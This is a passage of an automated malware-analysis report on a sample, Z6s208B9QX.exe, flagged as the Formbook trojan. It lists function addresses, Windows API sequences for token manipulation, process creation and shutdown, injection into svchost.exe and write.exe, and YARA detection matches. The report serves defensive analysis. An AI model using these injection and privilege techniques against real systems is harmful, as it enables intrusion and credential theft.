            Source: C:\Users\user\Desktop\Z6s208B9QX.exeCode function: 0_2_00431BE8: GetFullPathNameW,__swprintf,_wcslen,CreateDirectoryW,CreateFileW,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,0_2_00431BE8
            Source: C:\Users\user\Desktop\Z6s208B9QX.exeCode function: 0_2_00446313 DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,_wcsncpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00446313
            Source: C:\Users\user\Desktop\Z6s208B9QX.exeCode function: 0_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,0_2_004333BE
            Source: C:\Users\user\Desktop\Z6s208B9QX.exeCode function: 0_2_004096A00_2_004096A0
            Source: C:\Users\user\Desktop\Z6s208B9QX.exeCode function: 0_2_0042200C0_2_0042200C
            Source: C:\Users\user\Desktop\Z6s208B9QX.exeCode function: 0_2_0041A2170_2_0041A217
            Source: C:\Users\user\Desktop\Z6s208B9QX.exeCode function: 0_2_004122160_2_00412216
            Source: C:\Users\user\Desktop\Z6s208B9QX.exeCode function: 0_2_0042435D0_2_0042435D
            Source: C:\Users\user\Desktop\Z6s208B9QX.exeCode function: 0_2_004033C00_2_004033C0
            Source: C:\Users\user\Desktop\Z6s208B9QX.exeCode function: 0_2_0044F4300_2_0044F430
            Source: C:\Users\user\Desktop\Z6s208B9QX.exeCode function: 0_2_004125E80_2_004125E8
            Source: C:\Users\user\Desktop\Z6s208B9QX.exeCode function: 0_2_0044663B0_2_0044663B
            Source: C:\Users\user\Desktop\Z6s208B9QX.exeCode function: 0_2_004138010_2_00413801
            Source: C:\Users\user\Desktop\Z6s208B9QX.exeCode function: 0_2_0042096F0_2_0042096F
            Source: C:\Users\user\Desktop\Z6s208B9QX.exeCode function: 0_2_004129D00_2_004129D0
            Source: C:\Users\user\Desktop\Z6s208B9QX.exeCode function: 0_2_004119E30_2_004119E3
            Source: C:\Users\user\Desktop\Z6s208B9QX.exeCode function: 0_2_0041C9AE0_2_0041C9AE
            Source: C:\Users\user\Desktop\Z6s208B9QX.exeCode function: 0_2_0047EA6F0_2_0047EA6F
            Source: C:\Users\user\Desktop\Z6s208B9QX.exeCode function: 0_2_0040FA100_2_0040FA10
            Source: C:\Users\user\Desktop\Z6s208B9QX.exeCode function: 0_2_0044EB5F0_2_0044EB5F
            Source: C:\Users\user\Desktop\Z6s208B9QX.exeCode function: 0_2_00423C810_2_00423C81
            Source: C:\Users\user\Desktop\Z6s208B9QX.exeCode function: 0_2_00411E780_2_00411E78
            Source: C:\Users\user\Desktop\Z6s208B9QX.exeCode function: 0_2_00442E0C0_2_00442E0C
            Source: C:\Users\user\Desktop\Z6s208B9QX.exeCode function: 0_2_00420EC00_2_00420EC0
            Source: C:\Users\user\Desktop\Z6s208B9QX.exeCode function: 0_2_0044CF170_2_0044CF17
            Source: C:\Users\user\Desktop\Z6s208B9QX.exeCode function: 0_2_00444FD20_2_00444FD2
            Source: C:\Users\user\Desktop\Z6s208B9QX.exeCode function: 0_2_0454F6580_2_0454F658
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_004183F38_2_004183F3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_004030908_2_00403090
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0042E9B38_2_0042E9B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00402BCE8_2_00402BCE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00402BD08_2_00402BD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0040FCC38_2_0040FCC3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0040FCBA8_2_0040FCBA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_004165DE8_2_004165DE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_004165E38_2_004165E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0040FEE38_2_0040FEE3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0040DF638_2_0040DF63
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037FA3528_2_037FA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038003E68_2_038003E6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0374E3F08_2_0374E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037E02748_2_037E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037C02C08_2_037C02C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037C81588_2_037C8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038001AA8_2_038001AA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037DA1188_2_037DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037301008_2_03730100
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037F81CC8_2_037F81CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037D20008_2_037D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037407708_2_03740770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037647508_2_03764750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0373C7C08_2_0373C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0375C6E08_2_0375C6E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038005918_2_03800591
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037405358_2_03740535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037F24468_2_037F2446
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037E44208_2_037E4420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037EE4F68_2_037EE4F6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037FAB408_2_037FAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037F6BD78_2_037F6BD7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0373EA808_2_0373EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037569628_2_03756962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0380A9A68_2_0380A9A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037429A08_2_037429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0374A8408_2_0374A840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037428408_2_03742840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0376E8F08_2_0376E8F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037268B88_2_037268B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037B4F408_2_037B4F40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03760F308_2_03760F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037E2F308_2_037E2F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03782F288_2_03782F28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0374CFE08_2_0374CFE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03732FC88_2_03732FC8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037BEFA08_2_037BEFA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03740E598_2_03740E59
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037FEE268_2_037FEE26
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037FEEDB8_2_037FEEDB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03752E908_2_03752E90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037FCE938_2_037FCE93
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037DCD1F8_2_037DCD1F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0374AD008_2_0374AD00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0373ADE08_2_0373ADE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03758DBF8_2_03758DBF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03740C008_2_03740C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03730CF28_2_03730CF2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037E0CB58_2_037E0CB5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0372D34C8_2_0372D34C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037F132D8_2_037F132D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0378739A8_2_0378739A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037E12ED8_2_037E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0375B2C08_2_0375B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037452A08_2_037452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0372F1728_2_0372F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0377516C8_2_0377516C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0374B1B08_2_0374B1B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0380B16B8_2_0380B16B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037F70E98_2_037F70E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037FF0E08_2_037FF0E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037EF0CC8_2_037EF0CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037470C08_2_037470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037FF7B08_2_037FF7B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037F16CC8_2_037F16CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037F75718_2_037F7571
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037DD5B08_2_037DD5B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037314608_2_03731460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037FF43F8_2_037FF43F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037FFB768_2_037FFB76
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037B5BF08_2_037B5BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0377DBF98_2_0377DBF9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0375FB808_2_0375FB80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037B3A6C8_2_037B3A6C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037FFA498_2_037FFA49
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037F7A468_2_037F7A46
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037EDAC68_2_037EDAC6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037DDAAC8_2_037DDAAC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03785AA08_2_03785AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037E1AA38_2_037E1AA3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037499508_2_03749950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0375B9508_2_0375B950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037D59108_2_037D5910
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037AD8008_2_037AD800
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037438E08_2_037438E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037FFF098_2_037FFF09
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037FFFB18_2_037FFFB1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03741F928_2_03741F92
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03749EB08_2_03749EB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037F7D738_2_037F7D73
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037F1D5A8_2_037F1D5A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03743D408_2_03743D40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0375FDC08_2_0375FDC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037B9C328_2_037B9C32
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037FFCF28_2_037FFCF2
            Source: C:\Windows\SysWOW64\write.exeCode function: 11_2_047F442011_2_047F4420
            Source: C:\Windows\SysWOW64\write.exeCode function: 11_2_047FE4F611_2_047FE4F6
            Source: C:\Windows\SysWOW64\write.exeCode function: 11_2_0480244611_2_04802446
            Source: C:\Windows\SysWOW64\write.exeCode function: 11_2_0481059111_2_04810591
            Source: C:\Windows\SysWOW64\write.exeCode function: 11_2_0475053511_2_04750535
            Source: C:\Windows\SysWOW64\write.exeCode function: 11_2_0476C6E011_2_0476C6E0
            Source: C:\Windows\SysWOW64\write.exeCode function: 11_2_0475077011_2_04750770
            Source: C:\Windows\SysWOW64\write.exeCode function: 11_2_0477475011_2_04774750
            Source: C:\Windows\SysWOW64\write.exeCode function: 11_2_0474C7C011_2_0474C7C0
            Source: C:\Windows\SysWOW64\write.exeCode function: 11_2_047E200011_2_047E2000
            Source: C:\Windows\SysWOW64\write.exeCode function: 11_2_048041A211_2_048041A2
            Source: C:\Windows\SysWOW64\write.exeCode function: 11_2_047D815811_2_047D8158
            Source: C:\Windows\SysWOW64\write.exeCode function: 11_2_048101AA11_2_048101AA
            Source: C:\Windows\SysWOW64\write.exeCode function: 11_2_048081CC11_2_048081CC
            Source: C:\Windows\SysWOW64\write.exeCode function: 11_2_047EA11811_2_047EA118
            Source: C:\Windows\SysWOW64\write.exeCode function: 11_2_0474010011_2_04740100
            Source: C:\Windows\SysWOW64\write.exeCode function: 11_2_047F027411_2_047F0274
            Source: C:\Windows\SysWOW64\write.exeCode function: 11_2_047D02C011_2_047D02C0
            Source: C:\Windows\SysWOW64\write.exeCode function: 11_2_048103E611_2_048103E6
            Source: C:\Windows\SysWOW64\write.exeCode function: 11_2_0475E3F011_2_0475E3F0
            Source: C:\Windows\SysWOW64\write.exeCode function: 11_2_0480A35211_2_0480A352
            Source: C:\Windows\SysWOW64\write.exeCode function: 11_2_04750C0011_2_04750C00
            Source: C:\Windows\SysWOW64\write.exeCode function: 11_2_04740CF211_2_04740CF2
            Source: C:\Windows\SysWOW64\write.exeCode function: 11_2_047F0CB511_2_047F0CB5
            Source: C:\Windows\SysWOW64\write.exeCode function: 11_2_047ECD1F11_2_047ECD1F
            Source: C:\Windows\SysWOW64\write.exeCode function: 11_2_0475AD0011_2_0475AD00
            Source: C:\Windows\SysWOW64\write.exeCode function: 11_2_0474ADE011_2_0474ADE0
            Source: C:\Windows\SysWOW64\write.exeCode function: 11_2_04768DBF11_2_04768DBF
            Source: C:\Windows\SysWOW64\write.exeCode function: 11_2_0480CE9311_2_0480CE93
            Source: C:\Windows\SysWOW64\write.exeCode function: 11_2_04750E5911_2_04750E59
            Source: C:\Windows\SysWOW64\write.exeCode function: 11_2_0480EEDB11_2_0480EEDB
            Source: C:\Windows\SysWOW64\write.exeCode function: 11_2_0480EE2611_2_0480EE26
            Source: C:\Windows\SysWOW64\write.exeCode function: 11_2_04762E9011_2_04762E90
            Source: C:\Windows\SysWOW64\write.exeCode function: 11_2_047C4F4011_2_047C4F40
            Source: C:\Windows\SysWOW64\write.exeCode function: 11_2_04770F3011_2_04770F30
            Source: C:\Windows\SysWOW64\write.exeCode function: 11_2_047F2F3011_2_047F2F30
            Source: C:\Windows\SysWOW64\write.exeCode function: 11_2_04792F2811_2_04792F28
            Source: C:\Windows\SysWOW64\write.exeCode function: 11_2_04758F0D11_2_04758F0D
            Source: C:\Windows\SysWOW64\write.exeCode function: 11_2_0475CFE011_2_0475CFE0
            Source: C:\Windows\SysWOW64\write.exeCode function: 11_2_04742FC811_2_04742FC8
            Source: C:\Windows\SysWOW64\write.exeCode function: 11_2_047CEFA011_2_047CEFA0
            Source: C:\Windows\SysWOW64\write.exeCode function: 11_2_0475284011_2_04752840
            Source: C:\Windows\SysWOW64\write.exeCode function: 11_2_0475A84011_2_0475A840
            Source: C:\Windows\SysWOW64\write.exeCode function: 11_2_0477E8F011_2_0477E8F0
            Source: C:\Windows\SysWOW64\write.exeCode function: 11_2_047368B811_2_047368B8
            Source: C:\Windows\SysWOW64\write.exeCode function: 11_2_0476696211_2_04766962
            Source: C:\Windows\SysWOW64\write.exeCode function: 11_2_0481A9A611_2_0481A9A6
            Source: C:\Windows\SysWOW64\write.exeCode function: 11_2_047529A011_2_047529A0
            Source: C:\Windows\SysWOW64\write.exeCode function: 11_2_0474EA8011_2_0474EA80
            Source: C:\Windows\SysWOW64\write.exeCode function: 11_2_04806BD711_2_04806BD7
            Source: C:\Windows\SysWOW64\write.exeCode function: 11_2_0480AB4011_2_0480AB40
            Source: C:\Windows\SysWOW64\write.exeCode function: 11_2_0474146011_2_04741460
            Source: C:\Windows\SysWOW64\write.exeCode function: 11_2_0480F43F11_2_0480F43F
            Source: C:\Windows\SysWOW64\write.exeCode function: 11_2_048195C311_2_048195C3
            Source: C:\Windows\SysWOW64\write.exeCode function: 11_2_047ED5B011_2_047ED5B0
            Source: C:\Windows\SysWOW64\write.exeCode function: 11_2_0480757111_2_04807571
            Source: C:\Windows\SysWOW64\write.exeCode function: 11_2_0479563011_2_04795630
            Source: C:\Windows\SysWOW64\write.exeCode function: 11_2_048016CC11_2_048016CC
            Source: C:\Windows\SysWOW64\write.exeCode function: 11_2_0480F7B011_2_0480F7B0
            Source: C:\Windows\SysWOW64\write.exeCode function: 11_2_0480F0E011_2_0480F0E0
            Source: C:\Windows\SysWOW64\write.exeCode function: 11_2_048070E911_2_048070E9
            Source: C:\Windows\SysWOW64\write.exeCode function: 11_2_047FF0CC11_2_047FF0CC
            Source: C:\Windows\SysWOW64\write.exeCode function: 11_2_047570C011_2_047570C0
            Source: C:\Windows\SysWOW64\write.exeCode function: 11_2_0473F17211_2_0473F172
            Source: C:\Windows\SysWOW64\write.exeCode function: 11_2_0478516C11_2_0478516C
            Source: C:\Windows\SysWOW64\write.exeCode function: 11_2_0475B1B011_2_0475B1B0
            Source: C:\Windows\SysWOW64\write.exeCode function: 11_2_0481B16B11_2_0481B16B
            Source: C:\Windows\SysWOW64\write.exeCode function: 11_2_047F12ED11_2_047F12ED
            Source: C:\Windows\SysWOW64\write.exeCode function: 11_2_0476B2C011_2_0476B2C0
            Source: C:\Windows\SysWOW64\write.exeCode function: 11_2_047552A011_2_047552A0
            Source: C:\Windows\SysWOW64\write.exeCode function: 11_2_0473D34C11_2_0473D34C
            Source: C:\Windows\SysWOW64\write.exeCode function: 11_2_0480132D11_2_0480132D
            Source: C:\Windows\SysWOW64\write.exeCode function: 11_2_0479739A11_2_0479739A
            Source: C:\Windows\SysWOW64\write.exeCode function: 11_2_047C9C3211_2_047C9C32
            Source: C:\Windows\SysWOW64\write.exeCode function: 11_2_0480FCF211_2_0480FCF2
            Source: C:\Windows\SysWOW64\write.exeCode function: 11_2_04753D4011_2_04753D40
            Source: C:\Windows\SysWOW64\write.exeCode function: 11_2_0476FDC011_2_0476FDC0
            Source: C:\Windows\SysWOW64\write.exeCode function: 11_2_04801D5A11_2_04801D5A
            Source: C:\Windows\SysWOW64\write.exeCode function: 11_2_04807D7311_2_04807D73
            Source: C:\Windows\SysWOW64\write.exeCode function: 11_2_04759EB011_2_04759EB0
            Source: C:\Windows\SysWOW64\write.exeCode function: 11_2_0480FFB111_2_0480FFB1
            Source: C:\Windows\SysWOW64\write.exeCode function: 11_2_0480FF0911_2_0480FF09
            Source: C:\Windows\SysWOW64\write.exeCode function: 11_2_04713FD211_2_04713FD2
            Source: C:\Windows\SysWOW64\write.exeCode function: 11_2_04713FD511_2_04713FD5
            Source: C:\Windows\SysWOW64\write.exeCode function: 11_2_04751F9211_2_04751F92
            Source: C:\Windows\SysWOW64\write.exeCode function: 11_2_047BD80011_2_047BD800
            Source: C:\Windows\SysWOW64\write.exeCode function: 11_2_047538E011_2_047538E0
            Source: C:\Windows\SysWOW64\write.exeCode function: 11_2_0475995011_2_04759950
            Source: C:\Windows\SysWOW64\write.exeCode function: 11_2_0476B95011_2_0476B950
            Source: C:\Windows\SysWOW64\write.exeCode function: 11_2_047C3A6C11_2_047C3A6C
            Source: C:\Windows\SysWOW64\write.exeCode function: 11_2_047FDAC611_2_047FDAC6
            Source: C:\Windows\SysWOW64\write.exeCode function: 11_2_04807A4611_2_04807A46
            Source: C:\Windows\SysWOW64\write.exeCode function: 11_2_0480FA4911_2_0480FA49
            Source: C:\Windows\SysWOW64\write.exeCode function: 11_2_047EDAAC11_2_047EDAAC
            Source: C:\Windows\SysWOW64\write.exeCode function: 11_2_04795AA011_2_04795AA0
            Source: C:\Windows\SysWOW64\write.exeCode function: 11_2_047F1AA311_2_047F1AA3
            Source: C:\Windows\SysWOW64\write.exeCode function: 11_2_0478DBF911_2_0478DBF9
            Source: C:\Windows\SysWOW64\write.exeCode function: 11_2_047C5BF011_2_047C5BF0
            Source: C:\Windows\SysWOW64\write.exeCode function: 11_2_0480FB7611_2_0480FB76
            Source: C:\Windows\SysWOW64\write.exeCode function: 11_2_0476FB8011_2_0476FB80
            Source: C:\Windows\SysWOW64\write.exeCode function: 11_2_00541A7011_2_00541A70
            Source: C:\Windows\SysWOW64\write.exeCode function: 11_2_0053C9C011_2_0053C9C0
            Source: C:\Windows\SysWOW64\write.exeCode function: 11_2_0053C9B711_2_0053C9B7
            Source: C:\Windows\SysWOW64\write.exeCode function: 11_2_0053CBE011_2_0053CBE0
            Source: C:\Windows\SysWOW64\write.exeCode function: 11_2_0053AC6011_2_0053AC60
            Source: C:\Windows\SysWOW64\write.exeCode function: 11_2_005450F011_2_005450F0
            Source: C:\Windows\SysWOW64\write.exeCode function: 11_2_005432DB11_2_005432DB
            Source: C:\Windows\SysWOW64\write.exeCode function: 11_2_005432E011_2_005432E0
            Source: C:\Windows\SysWOW64\write.exeCode function: 11_2_0055B6B011_2_0055B6B0
            Source: C:\Windows\SysWOW64\write.exeCode function: 11_2_0456E42411_2_0456E424
            Source: C:\Windows\SysWOW64\write.exeCode function: 11_2_0456C67811_2_0456C678
            Source: C:\Windows\SysWOW64\write.exeCode function: 11_2_0456E7BC11_2_0456E7BC
            Source: C:\Windows\SysWOW64\write.exeCode function: 11_2_0456E30411_2_0456E304
            Source: C:\Windows\SysWOW64\write.exeCode function: 11_2_0456D82811_2_0456D828
            Source: C:\Windows\SysWOW64\write.exeCode function: String function: 047CF290 appears 105 times
            Source: C:\Windows\SysWOW64\write.exeCode function: String function: 04785130 appears 50 times
            Source: C:\Windows\SysWOW64\write.exeCode function: String function: 047BEA12 appears 86 times
            Source: C:\Windows\SysWOW64\write.exeCode function: String function: 04797E54 appears 111 times
            Source: C:\Windows\SysWOW64\write.exeCode function: String function: 0473B970 appears 279 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03775130 appears 58 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03787E54 appears 102 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0372B970 appears 278 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 037BF290 appears 105 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 037AEA12 appears 86 times
            Source: C:\Users\user\Desktop\Z6s208B9QX.exeCode function: String function: 004115D7 appears 36 times
            Source: C:\Users\user\Desktop\Z6s208B9QX.exeCode function: String function: 00416C70 appears 39 times
            Source: C:\Users\user\Desktop\Z6s208B9QX.exeCode function: String function: 00445AE0 appears 65 times
            Source: Z6s208B9QX.exe, 00000000.00000003.1281513646.0000000004AA3000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Z6s208B9QX.exe
            Source: Z6s208B9QX.exe, 00000000.00000003.1286509448.0000000004C4D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Z6s208B9QX.exe
            Source: Z6s208B9QX.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: 8.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 8.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000B.00000002.3738831581.0000000000530000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000008.00000002.1730607904.0000000003690000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000008.00000002.1730238566.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000B.00000002.3743731307.0000000002A60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000B.00000002.3742814788.0000000002A00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000008.00000002.1730979134.0000000003B50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
